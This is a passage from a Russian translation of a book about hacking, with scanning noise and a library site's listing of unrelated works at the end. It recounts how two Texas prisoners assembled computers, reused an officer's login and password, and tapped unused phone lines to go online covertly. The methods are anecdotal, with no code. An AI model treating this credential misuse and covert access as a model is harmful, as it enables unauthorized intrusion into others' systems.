Истории, рассказанные в этой книге и на страницах прессы, демонстрируют, как небезопасны все государственные компьютерные системы, и как мы уязвимы перед подобными атаками. Очень мало систем обладают действительно надежным уровнем безопасности.

В эпоху терроризма необходимо постараться сделать все возможное, чтобы залатать имеющиеся и возникающие дыры. Эпизоды, рассказанные выше, говорят о серьезной проблеме: как легко таланты и знания наших детей могут быть обращены против нашего об- А щества. Я не сомневаюсь, что уже в школе детям надо преподавать й основы компьютерной этики параллельно с изучением основ инфор- н матики. т;

о Не так давно я слушал выступление Франка Абагналя, ярого сто- "g ронника фильма «Поймай меня, если сможешь». Франк провел опрос среди студентов университетов по всей стране об этической стороне § использования компьютеров. Каждому студенту был задан вопрос - ^ считает ли он возможным для себя узнать пароль приятеля и проникнуть в его компьютер. Как это ни удивительно, но 48% опрошенных студентов ответили, что находят такую перспективу весьма забавной. С таким настроем молодежи несложно понять, почему люди начинают заниматься подобными делами.

Если кто-то знает, как сделать юных хакеров невосприимчивыми к попыткам наших явных и тайных врагов использовать их в своих интересах, пусть он обнародует свои предложения.

глав Хакерство в Техасской тюрьме

–  –  –

Д вое молодых заключенных, отбывающих сроки за убийство, в один прекрасный день встретились во дворе тюрьмы Техаса и обнаружили, что у них есть общее увлечение — компьютеры. Они сдружились и начали хакерствовать прямо под носом у стражей порядка.

Но все это в прошлом. Сегодня Вильям Батлер каждое утро в 5.30 садится в свою машину и начинает непростой путь через плотный трафик Хьюстона. Он считает себя везунчиком уже потому, что остался в живых. У него постоянная подружка и блестящий новый автомобиль. «Недавно мне прибавили к зарплате семь тысяч долларов. Неплохо», — гордо добавляет он.

Как и Вильям, его дружок Дэнни тоже наладил свою жизнь, у него стабильная работа, связанная с компьютерами. Но они никогда не забудут, какой ценой они заплатили за свое благосостояние. Как это ни странно, но именно время, проведенное в тюрьме, дало им те умения, которые они с таким успехом применяют в «свободном мире».

ВНУТРИ: ПОТРОША КОМПЬЮТЕРЫ

Для новичка тюрьма становится настоящим шоком. Все прибывшие находятся в одном помещении до тех пор, пока самые отъявленные и закоренелые преступники будут отделены — очень тяжелое испытание для тех, кто пытается жить по общечеловеческим правилам. В окружении людей, которые могут взорваться по любому поводу, даже самому кроткому и тихому человеку приходится быть жестким и постоянно готовым постоять за себя. Вильям выработал свой способ выживания:

«Я жил так, как следует жить там. Рост мой сто семьдесят восемь сантиметров, а вот вес - больше ста килограммов. Но крупные размеры - это не главное, важнее то, что я в душе - сильный человек, я никому не позволю командовать мной. Так я себя и держу в любой компании.

В тюрьме, если только ты покажешь свою слабость, обязательно кто-то захочет тебя использовать. Я не лгу, я ни к кому не пристаю, но и ко мне 58 никому не советую приставать, поскольку я пошлю его сами понимаете куда.

по И я, и Д э н н и о б а б ы в а л и в с у р о в ы х переделках. Вы понимаете, что я имею в виду: нечто вроде гладиаторских боев, когда приходится сражаться буквально все время. Мы не сдавались никому - ни охранникам, ни сокамерникам. Мы сражались, пока стояли на ногах, в общем, делали все, что могли».

Дэнни уже отбывал двадцатилетний срок в тюрьме Wynne, расположенной в городе Хантсвилль (штат Техас), когда Вильям прибыл.

Тогда его работа в тюрьме ничего общего с компьютерами не имела.

«Сначала они послали меня в такую тюрьму, где заключенные были заняты на сельскохозяйственных работах. Они рыхлили грядки мотыгами.

Это занятие вполне можно было механизировать, но этого не делалось - это был вид наказания, чтобы вы были готовы к более тяжелым работам впоследствии».

Когда Дэнни перевели в тюрьму Wynne, ему доверили работу клерка в транспортном отделе. «Я начал работать на печатной машинке Olivetti с экраном и несколькими жесткими дисками. Там была простейшая операционная система и слабенькая память. Я долго думал, как бы ее использовать». (Для меня это знакомый механизм: первый компьютер, который я использовал в жизни, был телетайп Olivetti с акустическим модемом).

Ему удалось найти какое-то старинное руководство для работы с базами данных под названием dBase III. «Я разобрался, как можно поместить в базу данных доклад, пока все другие будут печатать в это время свои сообщения». Он загрузил в базу данных все тюремные заказы и запустил программу, которая отслеживала все поставки сельскохозяйственных продуктов из тюрьмы в другие тюрьмы штата.

Постепенно Дэнни стали доверять, и он получил более ответственную работу, для которой приходилось выходить за ворота тюрьмы. Его направили на работу в офис распределения, расположенный в трейлере за колючей проволокой, который занимался подготовкой бумаг для трейлеров, перевозящих продукты питания. Но гораздо важнее было то, что они дали ему «первый реальный доступ к компьютерам».

Через какое-то время ему даже выделили небольшую комнатку в этом трейлере и доверили под его ответственность все оборудование — от сборки новых устройств до починки старых. Это была уникальная возможность: научиться, как создавать компьютеры и чинить их на личном опыте. Некоторые из людей, с которыми он контактировал, приносили ему компьютерные книги, которые ускоряли процесс обучения.

Постоянный контакт с компьютером давал ему доступ к «полке, 59 полной компьютерных деталей безо всякого учета и отчета». Вскоре он научился собирать компьютеры и добавлять в них компоненты. х Сотрудники тюрьмы не проверяли компьютеры и не разбирались 5 в том, как он их перестроил, поэтому он запросто мог дополнить ° ° компьютеры неучтенными деталями.

ВСЕ ТЮРЬМЫ РАЗНЫЕ I

Такая беззаботность в отношении того, чем занимаются заклю- ченные, нетипична для государственных тюрем США. Агентство Q контроля над тюрьмами в США всегда очень внимательно следит за этой проблемой. Во время моего нахождения в тюрьме у меня была специальная пометка «НЕ ДОПУСКАТЬ К КОМПЬЮТЕРУ», что означало, что допуск меня к компьютеру является угрозой безопасности.

Меня не допускали даже к телефону: прокурор однажды заявил представителям суда, что если мне в заключении разрешат пользоваться телефоном, то я смогу свистнуть в него и таким образом послать команду межконтинентальным ракетам! Конечно, это звучит как немыслимый абсурд, но у судей не было оснований не верить подобному заявлению. Меня держали в одиночной камере целых восемь месяцев.

В федеральных тюрьмах США в то время заключенным разрешали пользоваться компьютером только при соблюдении целого ряда строгих правил. Ни один заключенный не мог пользоваться компьютером, если тот соединен с модемом, или с компьютерной сетью или с другим коммуникационным устройством. Все компьютеры и другие системы, содержащие мало-мальски важную информацию, были помечены надписями «Только для персонала», поэтому о любом использовании их заключенными становится известно и считается угрозой безопасности. Все компьютеры пристально контролируются технически грамотными сотрудниками, чтобы предотвратить неавторизованный доступ к ним.

ВИЛЬЯМ НАХОДИТ «КЛЮЧИ ОТ ЗАМКА»

Когда Вильяма перевели из его «сельскохозяйственной» тюрьмы в тюрьму Wynne в Хантсвилле, он получил там завидную работу на кухне. «Я получил настоящие «ключи от замка», поскольку еду всегда можно обменять на другие нужные вещи».

В кухне был компьютер, древняя машина с 286-м процессором и вентилятором на передней панели, но еще вполне приемлемая для его цели — усовершенствовать свои компьютерные навыки. Он мог заносить туда всевозможные отчеты о продуктах и делать заказы 60 в электронной форме, что экономило часы бесполезного переписывания цифр с одной бумажонки на другую.

После того, как Вильям выяснил, что есть еще один заключенный, гг, который разделяет его интерес к компьютерам, Дэнни помог ему усовершенствовать его компьютер. Он вытащил необходимые запасные части с той самой полки в сельскохозяйственном трейлере и заручился помощью некоторых знакомых, которые могли свободно перемещаться по территории тюрьмы и перенесли все необходимое в комнатку Вильяма.

«Они ничего никому не говорили. Они принесли эти детали в кухню по нашей просьбе - просто поместили их в тележку и повезли.

А потом, в преддверии Рождества, один из.охранников принес в тюрьму коробку, в которой лежали все необходимые части компьютера».

Как ему удалось убедить охранника так грубо нарушить тюремные правила? «Я, что называется, «влез ему в душу» — мы разговаривали и подружились». Родители Вильяма купили все необходимые детали компьютера, которые он им заказал, а охранник согласился пронести в куче других рождественских подарков.

Для расширения своего «компьютерного парка» Вильям решил приспособить небольшую кладовку около кухни. В комнате не было даже вентилятора, но он был уверен, что ему не составит труда решить эту проблему: «Я выменял кондиционер на еду, мы пробили дыру в стене и поместили туда кондиционер, таким образом мы могли дышать и работать в комфортных условиях», — объяснил он.

«Мы собрали целых три компьютера. На место старого 286-го процессора мы поместили современный Pentium. Жесткие диски плохо вписывались в старую конструкцию, поэтому нам пришлось укреплять их при помощи картонных трубок из рулонов для туалетной бумаги», — забавно было бы посмотреть на это инновационное решение!

Почему именно три компьютера? Дэнни иногда мог заходить к Вильяму, и тогда у каждого был свой ПК. А потом и третий парень начал вести у них «адвокатскую практику», предлагая заключенным платные услуги по изучению их дел, составлению апелляций и других подобных бумаг.

Тем временем, мастерство Вильяма в организации всей бумажной работы в пункте питания привлекло внимание капитана, который руководил поставками питания. Он дал Вильяму более широкие полномочия: когда тот не был занят своими основными делами, он подготавливал материалы для докладов капитана своему руководству.

Чтобы лучше справляться со своими новыми обязанностями Вильяму было разрешено работать в офисе капитана, — редкое доверие заключенному. Через некоторое время Вильяму стало чего-то не хватать: его компьютеры в кухонном блоке были набиты музыкальными файлами, играми и видео. А в офисе капитана этих удоволь- х ствий не было. Старые добрые американские инновации плюс хоро- % шая порция бесстрашия проложили путь к решению проблемы.

«Я выменял еду из кухни на сетевой кабель с технического склада. Тамошний клерк заказал для нас триста метров кабеля пятой категории. g Его ввезли прямо через главные ворота. Я сказал охране, что работаю по "?

заданию капитана, и они открыли дверь». л SS Короче говоря, при помощи этого кабеля они соединили компью- Q тер в кабинете капитана с теми тремя, что стояли в кухонном отсеве.

Теперь, когда капитана не было в офисе, Вильям мог продолжать играть в свои любимые игры, слушать музыку и смотреть видеоклипы.

Все это было связано с очень большим риском. Если бы капитан вернулся в свой офис неожиданно и застал его, слушающего музыку, рассматривающего девиц, или играющего в игры на его компьютере, пришлось бы распрощаться со своим привилегированным положением на кухне, приятным времяпровождением в офисе капитана и доступом ко всем компьютерным удовольствиям, который он с таким трудом себе организовал.

У Дэнни в тот момент были свои проблемы. Он работал в сельскохозяйственном отделе, окруженный компьютерами, разъемы которых были соединены с внешним миром. Он был похож на ребенка, прижавшего нос к витрине кондитерского магазина, за которой спрятано сладкое богатство, на которое у него нет ни копейки денег.

Ужасная мука, когда желаемое так близко, но воспользоваться им нет никакой возможности.

Однажды в крошечной комнатке Дэнни появился офицер. «Он принес свой компьютер, потому что не знал, как выйти в Интернет.

Я не имел представления о том, как работает модем, никто не учил меня этому, но я мог помочь ему разобраться в этом». В процессе подключения ПК к Интернет-соединению офицер, по просьбе Дэнни, назвал ему свое имя пользователя и пароль; скорее всего, он просто не задумывался о последствиях такого шага, поскольку был уверен, что ни одного заключенного не допустят до компьютера с выходом в Интернет.

Дэнни понял, что офицер либо слишком туп, либо совсем необразован в техническом плане, чтобы осознать происходящее: он выдал Дэнни электронный билет в Интернет. Тайно используя телефонную линию, проходящую вблизи его комнаты, Дэнни соединил ее с встроенным модемом своего компьютера. Имея имя пользователя и пароль офицера, которые он, естественно, запомнил, он был «весь в шоколаде»: у него появился доступ в Интернет.

ONLINE - ЭТО БЕЗОПАСНОСТЬ

Для Дэнни доступ в Интернет означал целый мир на экране его 5 терминала. Но, так же как и Вильям, он подвергался большой опасности каждый раз, как он выходил в Интернет.

«Я мог выходить в Интернет и отыскивать там информацию о компьютерах и о чем угодно, задавать вопросы. Все это делалось от имени того офицера, но каждую минуту я боялся, что обман может открыться. Я старался быть максимально аккуратным и никогда не оставался в Интернете долгое время».

Несмотря на все предосторожности, его работа имела определенные последствия. Дэнни встроился в телефонную линию, которая была соединена с тюремным факсом. Вскоре со стороны других тюрем стали поступать жалобы на то, что их факс занят большую часть времени. Дэнни понял, что для безопасных и неспешных путешествий по Интернету необходима выделенная линия. После не слишком интенсивного поиска ему удалось найти решение: он обнаружил две телефонные линии, которые просто не использовались.

Никто из персонала тюрьмы даже не помнил, что они существуют.

Он соединил провод от своего модема с одной из этих линий. Теперь у него была собственная внешняя линия. Была решена еще одна проблема.

В самом углу своей крошечной комнаты под грудой пустых коробок он установил компьютер, который служил ему сервером — на самом деле он там хранил все, что перегружал себе из Интернета — музыкальные файлы, хакерские инструкции и все то, что ему не хотелось хранить на своем компьютере, так как кто-то мог случайно туда заглянуть, и увидеть то, что видеть не следовало. Все вроде бы шло своим чередом, но Дэнни был озабочен еще одной проблемой, которая казалась ему гораздо более серьезной. Он не мог понять, что будет, если он и офицер (под именем которого он входил в Интернет) одновременно попытаются использовать одно и то же имя для входа в Интернет. Если Дэнни будет работать под его именем, получит ли офицер уведомление о том, что кто-то его уже использует? Офицер наверняка расстроится, и наверняка начнет задумываться, и припомнит, что давал Дэнни свое имя и пароль. Дэнни не мог найти решения этой проблемы; она буквально подавляла его.

И все же он был горд тем, чего ему удалось достичь в сложившихся обстоятельствах. На это пришлось потратить колоссальные усилия. «Я смог построить вполне приличную систему — работающие сервера, перегрузка всего, что меня интересовало в Интернете — игры, видео, хакерская информация, информация об устройстве сетей, их уязвимых местах, о том, как отыскать открытый порт».

Вильям объясняет, почему Дэнни удалось построить свой офис в сельскохозяйственном отделе. «По сути дела он работал сетевым администратором, поскольку те вольнонаемные сотрудники, которые должны были этим заниматься, были полными ничтожествами». Они ш не знали, как писать программы на языках C++ и Visual Basic, поэтому просто не могли выполнять свои обязанности, у них не хватало ума g и на то, чтобы адекватно организовывать работу сети. "?

Одна из проблем, беспокоивших Дэнни, была в том, что его компь- п ютер стоял на проходе и любой желающий мог посмотреть, что он де- лает. После окончания рабочих часов его сельскохозяйственный Q офис запирался, поэтому он мог выходить в Интернет только в течение дня, отыскивая такие минуты, когда все остальные сотрудники офиса были слишком заняты своей собственной работой, чтобы обращать на него внимание. Ему пришлось придумать даже способ использования другого компьютера — он соединил свой ПК с другим, который использовал гражданский сотрудник, работавший рядом с ним. Когда тот не сидел на своем месте и никого не было вокруг, Дэнни входил с того компьютера в Интернет и через него скачивал на свой сервер в углу необходимые ему музыкальные файлы или игры.



Pages:   || 2 | 3 | 4 | 5 |

Похожие работы:

«ПОЯСНИТЕЛЬНАЯ ЗАПИСКА Географическое краеведение. 6 класс. Главным объектом изучения является родной край. Построение и содержание курса определяется его общеобразовательным и пропедевтическим значением, возрастными особенностями познавательных возможностей учащихся, а также наличием опорных знаний и умений сформ...»

«Виртуальная экскурсия "Путешествие по крестьянской избе села Тырново" (на экспонатах школьного историко-краеведческого музея) Автор: учитель истории и обществознания Гонтарь А.Д. Цель: познакомить обучающихся с предметами быта, оформлением русской крестьянской избы.Задачи: – формиров...»

«Научно-исследовательская работа Тема работы: "Здесь воздух на истории настоян" Выполнила Палешева Юнна Александровна Учащаяся 6 класса муниципального общеобразовательного учреждения "Заостровская основная школа"Руководитель: Миронова Тамара Викторовна учитель русского языка и литературы Огл...»

«Министерство образования Республики Беларусь Учреждение образования "Полоцкий государственный университет" Т. Н. Глазырина МЕТОДИКА ПРЕПОДАВАНИЯ ИСТОРИИ Учебно-методический комплекс для студентов специаль...»

«СПИСОК ТРУДОВ Б. А. РОМАНОВА Смердий конь и смерд. (В летописи и Русской Правде). Известия Отделения русского язы ка и словесности, т. XITT, кн. 3. СПб., 1908, стр. 18—35. Указатели (имен, авторов и предметный). В кн.: А. П р...»

«“Вопросы культурологии”.-2010.-№12.-C.85-90. Культура исламо-христианского диалога в России Силантьев Роман Анатольевич* ФГОУ ВПО "Московский государственный лингвистический университет". Россия, 119034, Москва, ул. Остоженка, 38. E-mail: rsilantiev@mail.ru В статье затрагивается актуальная и малоизучен...»

«Муниципальное бюджетное образовательное учреждение г.Ульяновска "Средняя школа №28" "Рассмотрено" "Согласовано" "Утверждаю" на заседании МО Заместитель директора по УМР Директор школы Руководитель МО учителей русского языка, литературы, истории и обществознания А.А....»

«Петров Павел Николаевич НУМИЗМАТИЧЕСКАЯ ИСТОРИЯ ЧАГАТАИДСКОГО ГОСУДАРСТВА 668/1270 — 770/1369 гг. 07.00.09 — Историография, источниковедение и методы исторического исследования Автореферат диссертации на соискание ученой степени кандидата исторических наук Казань — 2007 Работа выполнена на кафедре истории татарского народа Государс...»

«Празднуйте среди всех народов 2000 лет воскрсения Иисуса Христа. Представьте. Представьте. величайшее празднование за всю историю: 2000 лет воскресения Христа! Представьте. вселенское Тело верующих собрано по всех регионах Земли! Представьте. Церковь, которая выражает миру...»

«Т. Плат Сведения об авторе Плат Тильман – доктор исторических наук, университет Грайфсвальда, Германия. E-mail tilmanplath@yahoo.de. НА ПУТИ К ЗАПАДУ? КОНСТИТУЦИЯ ЛАТВИИ 1922 ГОДА Резюме Статья посвящена про...»

«Архипова Нина Геннадьевна СТАРООБРЯДЦЫ АМУРСКОЙ ОБЛАСТИ: ИСТОРИЯ И ОСОБЕННОСТИ ЯЗЫКОВОГО СУЩЕСТВОВАНИЯ В статье рассматриваются русские говоры старообрядцев Амурской области, сложившиеся в условиях инодиалектного и иноязычного окружения и испытавшие влияние польского, белорусского, монголо-бурятского, китайск...»

«Восточная Азия: история и политика Вестник ДВО РАН. 2005. № 2 С.Ю.ВРАДИЙ Биография в традиции китайского историописания: образ Линь Цзэсюя (1785–1850) в цинской историографии Предпринята попытка, опираясь на анализ биографических материалов, посвященных выдающемуся государственному...»

«Муниципальное дошкольное образовательное учреждение № 44 детский сад комбинированного вида Копейского городского округа Одобрено на заседании педагогического совета Утверждено приказом заведующего от 06.09.2016г. протокол № 1 от 07.09.2016г. № 141/1 Рабочая учебная программа по развитию и коррекции...»

«1 СТРУКТУРА РАБОЧЕЙ ПРОГРАММЫ УЧЕБНОГО ПРЕДМЕТА "ИСТОРИЯ РОССИИ" I. Пояснительная записка.. 3 II. Общая характеристика учебного предмета..4 III. Описание места учебного предмета "История России" в уч...»

«Осадочные бассейны, седиментационные и постседиментационные процессы в геологической истории ЛИТОГЕОДИНАМИЧЕСКИЙ ПОДхОД ПРИ ИЗУЧЕНИИ ДОМАНИКИТОВЫх ФОРМАЦИЙ (ВОЛГО-УРАЛЬСКАЯ ОБЛАСТЬ, ЗАПАДНАЯ...»

«ИСТОРИЯ СОЗДАНИЯ КРАСНЫЙ ДРАКОН ТФ СОСТАВ ТРАВ Давайте посмотрим, какие составляющие экстракты трав предлагает Красный Дракон ТФ для восстановления и поддержания Мужского Здоровья: _ •••••••• _ Горянка (Эп...»

«1 Цель и задачи освоения дисциплины Целью освоения дисциплины "Философия" является формирование у бакалавров необходимых компетенций по основным разделам философии: онтологии, гносеологии, антропологии, аксиологии, истории философии; создание целостного системного представления о мире в целом...»

«Эльдар Ахадов Державный пантеон http://www.litres.ru/pages/biblio_book/?art=11310910 ISBN 978-5-4474-1775-8 Аннотация "Державный пантеон" – поэтическое сказание Эльдара Ахадова о благих деяниях правителей России со времен Древней Руси до событий 1917 года. Сказание основано на классическом труде Н. М. Карамзина "История гос...»

«ности из позднетесинских склепов, материалы из которых до сих пор отсутствуют в научном обороте. Библиография Громов А.В. К антропологии тесинского населения Минусинской котловины // Вестник Томского государственного университета. История...»

«Оливер Стоун Питер Кузник Нерассказанная история США Издательский текст http://www.litres.ru/pages/biblio_book/?art=8326247 Нерассказанная история США: КоЛибри, Азбука-Аттикус; М.; 2014 ISBN 978-5-389-08903-7 Аннотация Мы не хотим заново пересказывать всю историю нашей страны – это попросту невозможно. Мы стремимся пролит...»

«Н. Г. ПОРФИРИДОВ Два сюжета древнерусской живописи в их отношении к литературной основе В истории мировой культуры трудно указать другой пример столь обязательных связей изобразительного искусства с литературой, как искусство Древней Руси. В эпических, лирических...»

«5 См.: Сазанов А. В. Амфоры ранневизантийского Боспора: (К хронологии некоторых типов) // Актуальные проблемы историко-археологических исследований. Киев, 1987. С. 142. См.: Леквинадзе В. А., Хвелидзе Л. И. Массовые археологические находки из раскопок в Нокалакеви. Археологически...»

«184 Rezensionen Hand genommen und durch einen Zeitraum von hundert Jahren gefiihrt. Bei der sehr klaren formalen und gut durchdachten Anlage des Buches bleiben gleichwohl einig...»

«Георг Мориц Эберс Тернистым путем [Каракалла] by Flint; OCR by Ustas, Spellcheck by Satok http://lib.aldebaran.ru "Эберс Г. Собрание сочинений в 9 т. Том 6. Тернистым путем": Терра – Книжный клуб; М.; 1999 ISBN 5?300?02412?0 (т.6), 5?300?01553?9 Аннотация Георг-Мориц Эберс (1837 – 1898) – известный немецкий ученый-египтолог, талантлив...»

«Олимпиада -2015-2016 уч. год Предмет Этап ВОШ класс Время выполнения история школьный 5 45мин. Задание 1 (За каждый правильный ответ 2 балла, всего 20 )время45 мин.1. Первый металл, из которого древние люди научились делать орудия труда:а) медь б) бронза в...»








 
2017 www.kniga.lib-i.ru - «Бесплатная электронная библиотека - онлайн материалы»

Материалы этого сайта размещены для ознакомления, все права принадлежат их авторам.
Если Вы не согласны с тем, что Ваш материал размещён на этом сайте, пожалуйста, напишите нам, мы в течении 1-2 рабочих дней удалим его.